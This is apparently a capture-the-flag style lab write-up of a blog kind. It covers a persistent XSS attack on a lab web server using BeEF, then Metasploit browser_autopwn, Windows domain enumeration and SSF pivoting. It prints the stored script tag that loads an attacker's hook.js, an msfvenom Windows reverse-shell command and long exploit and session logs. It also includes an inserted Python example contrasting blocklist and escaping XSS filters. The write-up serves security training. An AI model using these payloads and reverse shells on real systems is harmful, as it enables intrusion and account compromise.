BeEF kernel_require.rb:59:in `require': cannot load such file -- hitimes/hitimes (LoadError)
This was definitely one interesting lab. It spans web exploitation via persistent XSS, basic Active Directory pentesting and token impersonation. To complicate matters, but also for learning, I tried to avoid Metasploit where possible and was able to limit its use to just the initial step of exploiting the target machine to get a shell. Yes, I know that itself is quite a big step, but the lab isn't a typical CTF scenario where the aim is to get a user shell and then escalate to SYSTEM locally. There's AD involved and, by definition, domain users and admins.
Rather, the aim is to get a (domain) user shell, exploit outdated Active Directory configuration on the domain controller to find credentials, use those to get a local admin account, then either get a domain account or escalate to SYSTEM to dump the stored token credentials, and use those to log in to the DC.
We start out with just an IP address to check: 172.16.111.1
Our IP is 172.16.111.30
Start with the nmap scan, with service version detection (-sV) included.
root@Kali:~/PTP/5.3 XSS/Lab 27# nmap -n -Pn -sV 172.16.111.1
Starting Nmap 7.70 ( https://nmap.org ) at 2019-05-26 22:06 +08
Nmap scan report for 172.16.111.1
Host is up (0.22s latency).
Not shown: 999 filtered ports
PORT   STATE SERVICE VERSION
80/tcp open  http    Apache httpd 2.2.22 ((Debian))
MAC Address: 00:50:56:A1:DD:A8 (VMware)
From the above, we see a web server. Loading it gives us this:
Scrolling down we see a comment section. Might it be vulnerable to persistent XSS? We can try and see. To do this, fire up BeEF. If you don't have it, install it. Kali has it by default, but mine was somehow corrupted.
root@Kali:/usr/share/beef-xss# ./beef
Traceback (most recent call last):
	9: from ./beef:44:in `main'
	8: from /usr/lib/ruby/2.5.0/rubygems/core_ext/kernel_require.rb:59:in `require'
	7: from /usr/lib/ruby/2.5.0/rubygems/core_ext/kernel_require.rb:59:in `require'
	6: from /usr/share/beef-xss/core/loader.rb:14:in `'
	5: from /usr/lib/ruby/2.5.0/rubygems/core_ext/kernel_require.rb:59:in `require'
	4: from /usr/lib/ruby/2.5.0/rubygems/core_ext/kernel_require.rb:59:in `require'
	3: from /usr/lib/ruby/vendor_ruby/msgpack.rb:8:in `'
	2: from /usr/lib/ruby/vendor_ruby/msgpack.rb:11:in `rescue in '
	1: from /usr/lib/ruby/2.5.0/rubygems/core_ext/kernel_require.rb:59:in `require'
/usr/lib/ruby/2.5.0/rubygems/core_ext/kernel_require.rb:59:in `require': cannot load such file -- msgpack/msgpack (LoadError)
Even apt install beef-xss didn't work. I spent a lot of time troubleshooting, getting errors like these:
Installing do_sqlite3 0.10.17 with native extensions
Gem::Ext::BuildError: ERROR: Failed to build gem native extension.
What finally worked was to git clone the official repo, then run ./install.
You'll see this nice ASCII art loader:
root@Kali:~/Tools/beef# ./install
[BeEF ASCII art banner]
#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#
-- [ BeEF Installer ] --
#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#
When done, before running BeEF, edit the config.yaml file in the same directory as beef to set the default port for XSS payload URLs to port 80, so that it omits specifying the port in those URLs (the default is 8080, I think).
And before BeEF allows you to start, you have to change the default login credentials for the UI panel from
user: "beef"
passwd: "beef"
to something else. It's in the same YAML file. Then start BeEF.
root@Kali:~/Tools/beef# ./beef
[21:30:12][*] Browser Exploitation Framework (BeEF) 0.4.7.4-alpha-pre
[21:30:12]    |   Twit: @beefproject
[21:30:12]    |   Site: https://beefproject.com
[21:30:12]    |   Blog: http://blog.beefproject.com
[21:30:12]    |_  Wiki: https://github.com/beefproject/beef/wiki
[21:30:12][*] Project Creator: Wade Alcorn (@WadeAlcorn)
[21:30:12][*] BeEF is loading. Wait a few seconds...
[21:30:16][*] 8 extensions enabled:
[21:30:16]    |   Network
[21:30:16]    |   Admin UI
[21:30:16]    |   XSSRays
[21:30:16]    |   Social Engineering
[21:30:16]    |   Proxy
[21:30:16]    |   Events
[21:30:16]    |   Requester
[21:30:16]    |_  Demos
[21:30:16][*] 300 modules enabled.
[21:30:16][*] 3 network interfaces were detected.
[21:30:16][*] running on network interface: 127.0.0.1
[21:30:16]    |   Hook URL: http://127.0.0.1:3000/hook.js
[21:30:16]    |_  UI URL:   http://127.0.0.1:3000/ui/panel
[21:30:16][*] running on network interface: 192.168.92.134
[21:30:16]    |   Hook URL: http://192.168.92.134:3000/hook.js
[21:30:16]    |_  UI URL:   http://192.168.92.134:3000/ui/panel
[21:30:16][*] running on network interface: 172.16.111.30
[21:30:16]    |   Hook URL: http://172.16.111.30:3000/hook.js
[21:30:16]    |_  UI URL:   http://172.16.111.30:3000/ui/panel
[21:30:16][*] RESTful API key: d85d81c3482787e169efc4eb382388fc1a914dff
[21:30:16][!] [GeoIP] Could not find MaxMind GeoIP database: '/opt/GeoIP/GeoLite2-City.mmdb'
[21:30:16]    |_  Run ./update-geoipdb to install
[21:30:16][*] HTTP Proxy: http://127.0.0.1:6789
[21:30:16][*] BeEF server started (press control+c to stop)
Copy the Hook URL above; it's the link to the XSS payload. Take the one from the same interface as the web server. Go to the comment page on the website and paste in a comment containing the Hook URL.
Then visit the BeEF admin panel and log in with the creds you set in config.yaml. After entering the above I didn't see anything. Nothing was hooked except for my own browser, since it refreshed the page. After a while I figured that perhaps the comment API was filtering out the fake image. After all, images aren't supposed to be allowed.
It was only after I dropped the image JS variable and went with a much simpler script that it worked. Note: to prevent XSS triggering on WordPress, the angle brackets are replaced with square ones.
Hi all! [script src="http://172.16.111.30/hook.js"] [/script]
This time I got something: BeEF managed to hook a remote browser.
It's a Windows machine, and the details show it is running x86 Win Server 2008 R2 / 7. OK, so far so good, but how do we get our shell? At first I tried the Misc -> Raw JavaScript injection. I used msfvenom to generate the payload to get a JS shell:
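The comment filter that dropped the fake image but let the script tag through is a blocklist, and the fix on the server side is to escape comment text rather than strip known tags. The following is an added example, not code from the lab or the blog; the filter logic and the sample comments are constructed assumptions about what the comment page does.

```python
import html
import re

# Constructed sample comments (not taken from the lab). The second mirrors the
# blog's first, image-based attempt in shape only; the third is the shape of
# the script tag that got past the comment filter.
SAMPLE_COMMENTS = [
    "Nice write-up, thanks!",
    '<img src="http://example.invalid/x.png" onerror="alert(1)">',
    'Hi all! <script src="http://example.invalid/hook.js"></script>',
]

# Matches a whole <img ...> element, which is all the lab's filter seems to strip.
IMG_TAG = re.compile(r"<img\b[^>]*>", re.IGNORECASE)

# Elements a browser would execute if they reach the page as real markup.
# Escaping turns every '<' into '&lt;', so no such element can form afterwards.
ACTIVE_HTML = re.compile(r"<(script|img|iframe|svg|object|embed)\b", re.IGNORECASE)


def blocklist_filter(comment: str) -> str:
    """Reconstruction of the weak filter: drop <img> tags and pass everything
    else through as HTML. Any tag not on the list survives untouched."""
    return IMG_TAG.sub("", comment)


def escape_filter(comment: str) -> str:
    """The fix: treat the comment as text, never as markup. html.escape turns
    <, >, &, " and ' into entities, so no tag can be formed from user input."""
    return html.escape(comment, quote=True)


def contains_active_html(rendered: str) -> bool:
    """Whether the string that will be written into the page body still holds
    an element a browser would execute. Used to compare the two filters."""
    return ACTIVE_HTML.search(rendered) is not None


def audit(comments, filter_fn):
    """Run a filter over the comments and return the indices of those that
    would still execute in a visitor's browser."""
    return [i for i, c in enumerate(comments) if contains_active_html(filter_fn(c))]


if __name__ == "__main__":
    print("blocklist lets through:", audit(SAMPLE_COMMENTS, blocklist_filter))  # [2]
    print("escape lets through:   ", audit(SAMPLE_COMMENTS, escape_filter))     # []
```

A Content-Security-Policy that restricts script-src to the site's own origin would additionally stop an injected external script from loading even if a filter slip happens.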
root@Kali:~# msfvenom -p windows/shell_reverse_tcp LHOST=172.16.111.30 LPORT=4444 -f js_le -e generic/none
[-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload
[-] No arch selected, selecting arch: x86 from the payload
Found 1 compatible encoders
Attempting to encode payload with 1 iterations of generic/none
generic/none succeeded with size 324 (iteration=0)
generic/none chosen with final size 324
Payload size: 324 bytes
Final size of js_le file: 972 bytes
So I pasted this payload into the box.
But nothing happened at my end after setting up the listener. After fiddling around with the other commands in BeEF I came across Browser -> Hooked Domain -> Redirect Browser. Hmm, interesting: this means I can put a URL there and the victim's browser gets redirected to it?
Now, because we don't know what vulnerabilities the victim's browser might have, I opted to use the browser_autopwn module in msf. What it does is spawn a URL for the victim to visit. This URL leads to 20+ other pages, each with a different web exploit loaded with a meterpreter payload. Note that this is a very noisy attack vector and generally discouraged.
I used these settings:
msf5 auxiliary(server/browser_autopwn) > options

Module options (auxiliary/server/browser_autopwn):

   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   LHOST    172.16.111.30    yes       The IP address to use for reverse-connect payloads
   SRVHOST  172.16.111.30    yes       The local host to listen on. This must be an address on the local machine or 0.0.0.0
   SRVPORT  8080             yes       The local port to listen on.
   SSL      false            no        Negotiate SSL for incoming connections
   SSLCert                   no        Path to a custom SSL certificate (default is randomly generated)
   URIPATH                   no        The URI to use for this exploit (default is random)

Auxiliary action:

   Name       Description
   ----       -----------
   WebServer  Start a bunch of modules and direct clients to appropriate exploits

Now run exploit:
msf5 auxiliary(server/browser_autopwn) > exploit
[*] Auxiliary module running as background job 0.
[*] Setup
msf5 auxiliary(server/browser_autopwn) >
[*] Starting exploit modules on host 172.16.111.30...
[*] ---
[*] Starting exploit android/browser/webview_addjavascriptinterface with payload android/meterpreter/reverse_tcp
[*] Using URL: http://172.16.111.30:8080/bKuK
[*] Server started.
[*] Starting exploit multi/browser/firefox_proto_crmfrequest with payload generic/shell_reverse_tcp
[*] Using URL: http://172.16.111.30:8080/MpnIqqp
[*] Server started.
[*] Starting exploit multi/browser/firefox_tostring_console_injection with payload generic/shell_reverse_tcp
[*] Using URL: http://172.16.111.30:8080/SNxpDLP
[*] Server started.
[*] Starting exploit multi/browser/firefox_webidl_injection with payload generic/shell_reverse_tcp
[*] Starting exploit multi/browser/java_atomicreferencearray with payload java/meterpreter/reverse_tcp
[*] Using URL: http://172.16.111.30:8080/VUwLWRYpew
[*] Server started.
[*] Starting exploit multi/browser/java_jre17_jmxbean with payload java/meterpreter/reverse_tcp
[*] Using URL: http://172.16.111.30:8080/wZTLR
[*] Server started.
[*] Starting exploit multi/browser/java_jre17_provider_skeleton with payload java/meterpreter/reverse_tcp
[*] Using URL: http://172.16.111.30:8080/mgThGUbDCE
[*] Server started.
[*] Starting exploit multi/browser/java_jre17_reflection_types with payload java/meterpreter/reverse_tcp
[*] Using URL: http://172.16.111.30:8080/iVQnKNAyDsqC
[*] Server started.
[*] Starting exploit multi/browser/java_rhino with payload java/meterpreter/reverse_tcp
[*] Using URL: http://172.16.111.30:8080/dbySJjDuOJke
[*] Server started.
[*] Starting exploit multi/browser/java_verifier_field_access with payload java/meterpreter/reverse_tcp
[*] Using URL: http://172.16.111.30:8080/xjBUwIOgk
[*] Server started.
[*] Starting exploit multi/browser/opera_configoverwrite with payload generic/shell_reverse_tcp
[*] Using URL: http://172.16.111.30:8080/NGdcuOY
[*] Server started.
[*] Starting exploit windows/browser/adobe_flash_mp4_cprt with payload windows/meterpreter/reverse_tcp
[*] Using URL: http://172.16.111.30:8080/eiKX
[*] Server started.
[*] Starting exploit windows/browser/adobe_flash_rtmp with payload windows/meterpreter/reverse_tcp
[*] Using URL: http://172.16.111.30:8080/tguWbqbYltUB
[*] Server started.
[*] Starting exploit windows/browser/ie_cgenericelement_uaf with payload windows/meterpreter/reverse_tcp
[*] Using URL: http://172.16.111.30:8080/UDMMBMzdHL
[*] Server started.
[*] Starting exploit windows/browser/ie_createobject with payload windows/meterpreter/reverse_tcp
[*] Using URL: http://172.16.111.30:8080/MFUCKQpi
[*] Server started.
[*] Starting exploit windows/browser/ie_execcommand_uaf with payload windows/meterpreter/reverse_tcp
[*] Using URL: http://172.16.111.30:8080/DEbNhnJrjP
[*] Server started.
[*] Starting exploit windows/browser/mozilla_nstreerange with payload windows/meterpreter/reverse_tcp
[*] Using URL: http://172.16.111.30:8080/mDPl
[*] Server started.
[*] Starting exploit windows/browser/ms13_080_cdisplaypointer with payload windows/meterpreter/reverse_tcp
[*] Using URL: http://172.16.111.30:8080/gOZphDCTmIB
[*] Server started.
[*] Starting exploit windows/browser/ms13_090_cardspacesigninhelper with payload windows/meterpreter/reverse_tcp
[*] Using URL: http://172.16.111.30:8080/pRXQi
[*] Server started.
[*] Starting exploit windows/browser/msxml_get_definition_code_exec with payload windows/meterpreter/reverse_tcp
[*] Starting handler for windows/meterpreter/reverse_tcp on port 3333
[*] Starting handler for generic/shell_reverse_tcp on port 6666
[*] Started reverse TCP handler on 172.16.111.30:3333
[*] Using URL: http://172.16.111.30:8080/eghbkObV
[*] Server started.
[*] Using URL: http://172.16.111.30:8080/pHGel
[*] Server started.
[*] Starting handler for java/meterpreter/reverse_tcp on port 7777
[*] Started reverse TCP handler on 172.16.111.30:6666
[*] Started reverse TCP handler on 172.16.111.30:7777
[*] --- Done, found 20 exploit modules
[*] Using URL: http://172.16.111.30:8080/X7mSojl
[*] Server started.
Now feed the above URL to the victim via the Redirect Browser command.
You'll see a bunch of exploits spring to life:
[*] Handling '/X7mSojl'
[*] Handling '/X7mSojl?sessid=V2luZG93cyA3OnVuZGVmaW5lZDp1bmRlZmluZWQ6dW5kZWZpbmVkOnVuZGVmaW5lZDplbi1VUzp4ODY6TVNJRToxMC4wOg%3d%3d'
[*] JavaScript Report: Windows 7:undefined:undefined:undefined:undefined:en-US:x86:MSIE:10.0:
[*] Responding with 13 exploits
[*] 172.16.111.1 java_atomicreferencearray - Sending Java AtomicReferenceArray Type Violation Vulnerability
[*] 172.16.111.1 java_atomicreferencearray - Generated jar to drop (5310 bytes).
[*] 172.16.111.1 java_jre17_jmxbean - handling request for /mgThGUbDCE
[*] 172.16.111.1 java_atomicreferencearray - Sending Java AtomicReferenceArray Type Violation Vulnerability
[*] 172.16.111.1 java_atomicreferencearray - Generated jar to drop (5310 bytes).
[*] 172.16.111.1 java_jre17_jmxbean - handling request for /mgThGUbDCE/
[*] 172.16.111.1 java_jre17_jmxbean - handling request for /mgThGUbDCE
[*] 172.16.111.1 java_jre17_reflection_types - handling request for /dbySJjDuOJke
[*] 172.16.111.1 java_atomicreferencearray - Sending Java AtomicReferenceArray Type Violation Vulnerability
[*] 172.16.111.1 java_atomicreferencearray - Generated jar to drop (5310 bytes).
[*] 172.16.111.1 java_jre17_jmxbean - handling request for /mgThGUbDCE/
[*] 172.16.111.1 java_jre17_reflection_types - handling request for /dbySJjDuOJke/
[*] 172.16.111.1 java_jre17_jmxbean - handling request for /mgThGUbDCE
[*] 172.16.111.1 java_jre17_reflection_types - handling request for /dbySJjDuOJke
[*] 172.16.111.1 java_atomicreferencearray - Sending Java AtomicReferenceArray Type Violation Vulnerability
[*] 172.16.111.1 java_atomicreferencearray - Generated jar to drop (5310 bytes).
[*] 172.16.111.1 java_jre17_reflection_types - handling request for /dbySJjDuOJke/
[*] 172.16.111.1 java_jre17_jmxbean - handling request for /mgThGUbDCE/
[*] 172.16.111.1 java_rhino - Java Applet Rhino Script Engine Remote Code Execution handling request
[*] 172.16.111.1 java_jre17_reflection_types - handling request for /dbySJjDuOJke/onJQGHPo.jar
[*] 172.16.111.1 java_atomicreferencearray - Sending jar
[*] 172.16.111.1 java_jre17_jmxbean - handling request for /mgThGUbDCE/xBxeIbgz.jar
[*] 172.16.111.1 java_jre17_reflection_types - handling request for /dbySJjDuOJke/onJQGHPo.jar
[*] 172.16.111.1 java_atomicreferencearray - Sending jar
[*] 172.16.111.1 java_jre17_jmxbean - handling request for /mgThGUbDCE/xBxeIbgz.jar
[*] 172.16.111.1 java_jre17_jmxbean - handling request for /mgThGUbDCE
[*] 172.16.111.1 java_jre17_reflection_types - handling request for /dbySJjDuOJke
[*] 172.16.111.1 java_atomicreferencearray - Sending Java AtomicReferenceArray Type Violation Vulnerability
[*] 172.16.111.1 java_atomicreferencearray - Generated jar to drop (5310 bytes).
[*] 172.16.111.1 java_jre17_reflection_types - handling request for /dbySJjDuOJke/
[*] 172.16.111.1 java_jre17_jmxbean - handling request for /mgThGUbDCE/
[*] 172.16.111.1 java_rhino - Java Applet Rhino Script Engine Remote Code Execution handling request
[*] 172.16.111.1 java_verifier_field_access - Sending Java Applet Field Bytecode Verifier Cache Remote Code Execution
[*] 172.16.111.1 java_verifier_field_access - Generated jar to drop (5310 bytes).
[*] 172.16.111.1 java_rhino - Sending Applet.jar
[*] 172.16.111.1 java_jre17_reflection_types - handling request for /dbySJjDuOJke/dPcuYLAe.jar
[*] 172.16.111.1 java_jre17_jmxbean - handling request for /mgThGUbDCE/RVblRPsx.jar
[*] 172.16.111.1 java_atomicreferencearray - Sending jar
[*] 172.16.111.1 java_jre17_jmxbean - handling request for /mgThGUbDCE/RVblRPsx.jar
[*] 172.16.111.1 java_rhino - Sending Applet.jar
[*] 172.16.111.1 java_jre17_reflection_types - handling request for /dbySJjDuOJke/dPcuYLAe.jar
[*] 172.16.111.1 java_atomicreferencearray - Sending jar
[*] Sending stage (53844 bytes) to 172.16.111.1
[*] 172.16.111.1 java_jre17_jmxbean - handling request for /mgThGUbDCE
[*] 172.16.111.1 java_jre17_reflection_types - handling request for /dbySJjDuOJke
[*] 172.16.111.1 java_jre17_provider_skeleton - handling request for /iVQnKNAyDsqC
[*] 172.16.111.1 java_atomicreferencearray - Sending Java AtomicReferenceArray Type Violation Vulnerability
[*] 172.16.111.1 java_atomicreferencearray - Generated jar to drop (5310 bytes).
[*] 172.16.111.1 java_jre17_jmxbean - handling request for /mgThGUbDCE/
[*] 172.16.111.1 java_jre17_reflection_types - handling request for /dbySJjDuOJke/
[*] 172.16.111.1 java_rhino - Java Applet Rhino Script Engine Remote Code Execution handling request
[*] 172.16.111.1 java_verifier_field_access - Sending Java Applet Field Bytecode Verifier Cache Remote Code Execution
[*] 172.16.111.1 java_verifier_field_access - Generated jar to drop (5310 bytes).
[*] 172.16.111.1 java_jre17_provider_skeleton - handling request for /iVQnKNAyDsqC/
[*] 172.16.111.1 java_jre17_reflection_types - handling request for /dbySJjDuOJke/DLUOvQci.jar
[*] 172.16.111.1 java_rhino - Sending Applet.jar
[*] 172.16.111.1 java_atomicreferencearray - Sending jar
[*] 172.16.111.1 java_jre17_jmxbean - handling request for /mgThGUbDCE/hqtInWiz.jar
[*] 172.16.111.1 java_verifier_field_access - Sending jar
[*] 172.16.111.1 java_jre17_provider_skeleton - handling request for /iVQnKNAyDsqC/QkFXulv.jar
[*] 172.16.111.1 java_jre17_reflection_types - handling request for /dbySJjDuOJke/DLUOvQci.jar
[*] 172.16.111.1 java_atomicreferencearray - Sending jar
[*] 172.16.111.1 java_jre17_jmxbean - handling request for /mgThGUbDCE/hqtInWiz.jar
[*] 172.16.111.1 java_verifier_field_access - Sending jar
[*] 172.16.111.1 java_jre17_provider_skeleton - handling request for /iVQnKNAyDsqC/QkFXulv.jar
[*] 172.16.111.1 java_rhino - Java Applet Rhino Script Engine Remote Code Execution handling request
[*] 172.16.111.1 java_rhino - Java Applet Rhino Script Engine Remote Code Execution handling request
[*] 172.16.111.1 java_rhino - Java Applet Rhino Script Engine Remote Code Execution handling request
[*] 172.16.111.1 java_rhino - Java Applet Rhino Script Engine Remote Code Execution handling request
[*] Meterpreter session 1 opened (172.16.111.30:7777 -> 172.16.111.1:49332) at 2019-05-26 23:36:15 +0800
[*] Sending stage (53844 bytes) to 172.16.111.1
[*] Meterpreter session 2 opened (172.16.111.30:7777 -> 172.16.111.1:62351) at 2019-05-26 23:36:30 +0800
[*] Sending stage (53844 bytes) to 172.16.111.1
[*] Session ID 1 (172.16.111.30:7777 -> 172.16.111.1:49332) processing InitialAutoRunScript 'migrate -f'
[!] Meterpreter scripts are deprecated. Try post/windows/manage/migrate.
[!] Example: run post/windows/manage/migrate OPTION=value [...]
[-] Could not execute migrate: Rex::Post::Meterpreter::RequestError stdapi_sys_process_attach: Operation failed: 1
[*] Meterpreter session 3 opened (172.16.111.30:7777 -> 172.16.111.1:24873) at 2019-05-26 23:36:46 +0800
[*] Sending stage (53844 bytes) to 172.16.111.1
[*] Session ID 2 (172.16.111.30:7777 -> 172.16.111.1:62351) processing InitialAutoRunScript 'migrate -f'
[!] Meterpreter scripts are deprecated. Try post/windows/manage/migrate.
[!] Example: run post/windows/manage/migrate OPTION=value [...]
The full job list spawned by the above:
msf5 auxiliary(server/browser_autopwn) > jobs

Jobs
====

  Id  Name                                                       Payload                          Payload opts
  --  ----                                                       -------                          ------------
  0   Auxiliary: server/browser_autopwn
  1   Exploit: android/browser/webview_addjavascriptinterface    android/meterpreter/reverse_tcp  tcp://172.16.111.30:8888
  2   Exploit: multi/browser/firefox_proto_crmfrequest           generic/shell_reverse_tcp        tcp://172.16.111.30:6666
  3   Exploit: multi/browser/firefox_tostring_console_injection  generic/shell_reverse_tcp        tcp://172.16.111.30:6666
  4   Exploit: multi/browser/firefox_webidl_injection            generic/shell_reverse_tcp        tcp://172.16.111.30:6666
  5   Exploit: multi/browser/java_atomicreferencearray           java/meterpreter/reverse_tcp     tcp://172.16.111.30:7777
  6   Exploit: multi/browser/java_jre17_jmxbean                  java/meterpreter/reverse_tcp     tcp://172.16.111.30:7777
  7   Exploit: multi/browser/java_jre17_provider_skeleton        java/meterpreter/reverse_tcp     tcp://172.16.111.30:7777
  8   Exploit: multi/browser/java_jre17_reflection_types         java/meterpreter/reverse_tcp     tcp://172.16.111.30:7777
  9   Exploit: multi/browser/java_rhino                          java/meterpreter/reverse_tcp     tcp://172.16.111.30:7777
  10  Exploit: multi/browser/java_verifier_field_access          java/meterpreter/reverse_tcp     tcp://172.16.111.30:7777
  11  Exploit: multi/browser/opera_configoverwrite               generic/shell_reverse_tcp        tcp://172.16.111.30:6666
  12  Exploit: windows/browser/adobe_flash_mp4_cprt              windows/meterpreter/reverse_tcp  tcp://172.16.111.30:3333
  13  Exploit: windows/browser/adobe_flash_rtmp                  windows/meterpreter/reverse_tcp  tcp://172.16.111.30:3333
  14  Exploit: windows/browser/ie_cgenericelement_uaf            windows/meterpreter/reverse_tcp  tcp://172.16.111.30:3333
  15  Exploit: windows/browser/ie_createobject                   windows/meterpreter/reverse_tcp  tcp://172.16.111.30:3333
  16  Exploit: windows/browser/ie_execcommand_uaf                windows/meterpreter/reverse_tcp  tcp://172.16.111.30:3333
  17  Exploit: windows/browser/mozilla_nstreerange               windows/meterpreter/reverse_tcp  tcp://172.16.111.30:3333
  18  Exploit: windows/browser/ms13_080_cdisplaypointer          windows/meterpreter/reverse_tcp  tcp://172.16.111.30:3333
  19  Exploit: windows/browser/ms13_090_cardspacesigninhelper    windows/meterpreter/reverse_tcp  tcp://172.16.111.30:3333
  20  Exploit: windows/browser/msxml_get_definition_code_exec    windows/meterpreter/reverse_tcp  tcp://172.16.111.30:3333
  21  Exploit: multi/handler                                     windows/meterpreter/reverse_tcp  tcp://172.16.111.30:3333
  22  Exploit: multi/handler                                     generic/shell_reverse_tcp        tcp://172.16.111.30:6666
  23  Exploit: multi/handler                                     java/meterpreter/reverse_tcp     tcp://172.16.111.30:7777
At this point I got 4 meterpreter sessions, though more would spring up later.
msf5 auxiliary(server/browser_autopwn) > sessions

Active sessions
===============

  Id  Name  Type                      Information             Connection
  --  ----  ----                      -----------             ----------
  1         meterpreter java/windows  SecondUser @ PCCLIENT7  172.16.111.30:7777 -> 172.16.111.1:49332 (172.16.111.1)
  2         meterpreter java/windows  SecondUser @ PCCLIENT7  172.16.111.30:7777 -> 172.16.111.1:62351 (172.16.111.1)
  3         meterpreter java/java                             172.16.111.30:7777 -> 172.16.111.1:24873 (172.16.111.1)
  4         meterpreter java/java                             172.16.111.30:7777 -> 172.16.111.1:33893 (172.16.111.1)
Not wanting to rely on Meterpreter further, I dropped to a shell to explore.
meterpreter > shell
Process 1 created.
Channel 1 created.
Microsoft Windows [Version 6.1.7601]
Copyright (c) 2009 Microsoft Corporation.  All rights reserved.

C:\Users\SecondUser\Desktop>whoami && ipconfig /all
whoami && ipconfig /all
examplead\seconduser

Windows IP Configuration

   Host Name . . . . . . . . . . . . : PCCLIENT7
   Primary Dns Suffix  . . . . . . . : examplead.lan
   Node Type . . . . . . . . . . . . : Hybrid
   IP Routing Enabled. . . . . . . . : No
   WINS Proxy Enabled. . . . . . . . : No
   DNS Suffix Search List. . . . . . : examplead.lan

Ethernet adapter Local Area Connection:

   Connection-specific DNS Suffix  . :
   Description . . . . . . . . . . . : Intel(R) PRO/1000 MT Network Connection
   Physical Address. . . . . . . . . : 00-50-56-A1-96-E2
   DHCP Enabled. . . . . . . . . . . : No
   Autoconfiguration Enabled . . . . : Yes
   Link-local IPv6 Address . . . . . : fe80::95f0:8ae:46f0:ca5a%11(Preferred)
   IPv4 Address. . . . . . . . . . . : 192.168.200.210(Preferred)
   Subnet Mask . . . . . . . . . . . : 255.255.255.0
   Default Gateway . . . . . . . . . : 192.168.200.1
   DHCPv6 IAID . . . . . . . . . . . : 234901590
   DHCPv6 Client DUID. . . . . . . . : 00-01-00-01-24-76-AC-A0-00-50-56-A1-96-E2
   DNS Servers . . . . . . . . . . . : 192.168.200.100
   NetBIOS over Tcpip. . . . . . . . : Enabled

Tunnel adapter isatap.{33C07500-DFFE-4075-B5C5-5A63EA189D50}:

   Media State . . . . . . . . . . . : Media disconnected
   Connection-specific DNS Suffix  . :
   Description . . . . . . . . . . . : Microsoft ISATAP Adapter
   Physical Address. . . . . . . . . : 00-00-00-00-00-00-00-E0
   DHCP Enabled. . . . . . . . . . . : No
   Autoconfiguration Enabled . . . . : Yes
OK, let's check out the local user accounts.
C:\Users\SecondUser\Desktop>net user
net user

User accounts for \\PCCLIENT7

-------------------------------------------------------------------------------
Administrator            Guest                    LADM
The command completed successfully.

C:\Users\SecondUser\Desktop>net localgroup
net localgroup

Aliases for \\PCCLIENT7

-------------------------------------------------------------------------------
*Administrators
*Backup Operators
*Cryptographic Operators
*Distributed COM Users
*Event Log Readers
*Guests
*IIS_IUSRS
*Network Configuration Operators
*Performance Log Users
*Performance Monitor Users
*Power Users
*Remote Desktop Users
*Replicator
*Users
The command completed successfully.

C:\Users\SecondUser\Desktop>net localgroup Administrators
net localgroup Administrators
Alias name     Administrators
Comment

Members

-------------------------------------------------------------------------------
Administrator
EXAMPLEAD\Domain Admins
LADM
The command completed successfully.
Wait, that's odd: we didn't see our user SecondUser. What does this mean? But if we check against the list of domain users, it's there.
C:\Users\SecondUser\Desktop>net user /domain
net user /domain
The request will be processed at a domain controller for domain examplead.lan.

User accounts for \\DC01.examplead.lan

-------------------------------------------------------------------------------
Administrator            exampleadm               ExampleUser
Guest                    krbtgt                   SecondUser
The command completed successfully.
That means the current user doesn't even exist on the local machine but is a domain user. We can confirm this:
C:\Users\SecondUser\Desktop>net user seconduser /domain
net user seconduser /domain
The request will be processed at a domain controller for domain examplead.lan.

User name                    SecondUser
Full Name                    Second User
Comment                      User's comment
Country code                 000 (System Default)
Account active               Yes
Account expires              Never

Password last set            7/17/2014 6:01:58 AM
Password expires             Never
Password changeable          7/18/2014 6:01:58 AM
Password required            Yes
User may change password     Yes

Workstations allowed         All
Logon script
User profile
Home directory
Last logon                   6/1/2019 3:06:30 AM

Logon hours allowed          All

Local Group Memberships
Global Group memberships     *Example Group        *Domain Users
The command completed successfully.
So the domain controller is at dc01.examplead.lan. We can ping it:
C:\Users\SecondUser\Desktop>ping dc01.examplead.lan
ping dc01.examplead.lan

Pinging DC01.examplead.lan [192.168.200.100] with 32 bytes of data:
Reply from 192.168.200.100: bytes=32 time=6ms TTL=128
Reply from 192.168.200.100: bytes=32 time<1ms TTL=128
Reply from 192.168.200.100: bytes=32 time<1ms TTL=128
Reply from 192.168.200.100: bytes=32 time<1ms TTL=128

Ping statistics for 192.168.200.100:
    Packets: Sent = 4, Received = 4, Lost = 0 (0% loss),
Approximate round trip times in milli-seconds:
    Minimum = 0ms, Maximum = 6ms, Average = 1ms
As expected, the DC is the same as the DNS server the local machine indicated. Now let's check what other machines are running on the same subnet as our compromised host. We could do this via nmap after configuring the compromised host as a proxy to forward the nmap scans, but that usually takes too long. We will set up the proxy forwarder on the machine eventually, but for now let's do a simple ARP scan using the arp-scan tool we used previously.
C:\Lab27>arp-scan.exe -t 192.168.200.1/24
arp-scan.exe -t 192.168.200.1/24
Reply that 00:50:56:A1:E0:26 is 192.168.200.1 in 6.981474
Reply that 00:50:56:A1:52:8F is 192.168.200.100 in 15.713799
Reply that 00:50:56:A1:DD:E3 is 192.168.200.200 in 16.038212
Reply that 00:50:56:A1:F9:6D is 192.168.200.210 in 0.070679
Reply that 00:50:56:A1:F9:6D is 192.168.200.255 in 0.057410
The host is at 210, while the DC is at 100. So the only thing left to check is 200. But before that, let's set up the port proxy forwarder on the machine. Recall this involves robocopying SSF-Win32 after using Impacket's smbserver to run a publicly accessible shared folder on Kali. I haven't done it in some time, so I had to check some old posts 🙂
C:\Lab27>robocopy \\172.16.111.30\Lab27\SSF-Win32 C:\Lab27\SSF-Win32 /e
robocopy \\172.16.111.30\Lab27\SSF-Win32 C:\Lab27\SSF-Win32 /e
Then set up our SSF listener on Kali:
root@Kali:~/Tools/SSF-Linux# ./ssfd -p 11111
then run SSF-Win32 to connect back:
C:\Lab27\SSF-Win32>ssf.exe -F 22222 -p 11111 172.16.111.30
ssf.exe -F 22222 -p 11111 172.16.111.30
Our Kali SSF listener shows:
[2019-06-01T19:00:30+08:00] [info] [config] [tls] CA cert path:
[2019-06-01T19:00:30+08:00] [info] [config] [tls] cert path:
[2019-06-01T19:00:30+08:00] [info] [config] [tls] key path:
[2019-06-01T19:00:30+08:00] [info] [config] [tls] key password: <>
[2019-06-01T19:00:30+08:00] [info] [config] [tls] dh path:
[2019-06-01T19:00:30+08:00] [info] [config] [tls] cipher suite:
[2019-06-01T19:00:30+08:00] [info] [config] [http proxy]
